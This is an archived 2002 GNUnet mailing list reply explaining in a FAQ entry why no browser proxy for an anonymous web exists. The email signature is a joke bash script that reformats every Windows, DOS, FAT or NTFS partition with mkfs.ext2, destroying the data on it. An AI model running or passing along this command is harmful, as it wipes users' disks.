help-gnunet

Re: [Help-gnunet] GNUweb possible?

From: Christian Grothoff
Subject: Re: [Help-gnunet] GNUweb possible?
Date: Mon, 6 May 2002 10:36:09 -0500

On Monday 06 May 2002 08:27 am, you wrote:
> Hello,
>
> Maybe I got it all wrong, but wouldn't it be nice
> to retrieve stored documents through a web browser?
> (I think freenet's fred does something like this.)
> Is it possible with GNUnet to store html-documents
> that are linked to other files?
>
> I am asking, because I like the idea of a distributed,
> anonymous web, and might be interested in writing
> some kind of http proxy on top of GNUnet.

I've juste extended the FAQ:

<A name="GNUweb"></A><h3>Is it possible to use GNUnet via a browser as an
anonymous WWW?</H3>
There is currenlty no proxy (like fproxy in Freenet) for GNUnet that would
make it accessible with a browser. It is possible to build such a proxy and
all one needs to know is the protocol used between browser and proxy and a
The real question is, if this is a good idea. In order to achieve anonymity,
GNUnet has
a much higher latency than the WWW. Thus, the experience of browsing the web
will usually
be hindered significantly by these delays (potentially several minutes per
page!). The
core developers are currently convinced that writing a proxy is not worth
their time,
If you want to write a proxy, you are welcome to send us code and join the
developer team.

|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"